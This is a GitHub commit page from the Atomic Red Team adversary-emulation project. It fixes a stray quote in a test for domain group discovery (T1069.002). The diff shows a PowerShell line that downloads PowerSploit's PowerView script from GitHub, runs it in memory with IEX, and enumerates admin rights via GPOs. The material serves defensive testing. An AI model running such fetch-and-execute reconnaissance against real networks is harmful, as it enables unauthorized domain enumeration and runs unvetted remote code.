Skip to content

Commit

Permalink
T1069.002 Test redcanaryco#6 fix typo in command
Browse files Browse the repository at this point in the history
  • Loading branch information
kdebscwx authored Nov 22, 2023
1 parent a6065f8 commit a639c6d
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion atomics/T1069.002/T1069.002.md
Original file line number Diff line number Diff line change
Expand Up @@ -218,7 +218,7 @@ takes a computer and determines who has admin rights over it through GPO enumera

```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose
```


Expand Down

0 comments on commit a639c6d

Please sign in to comment.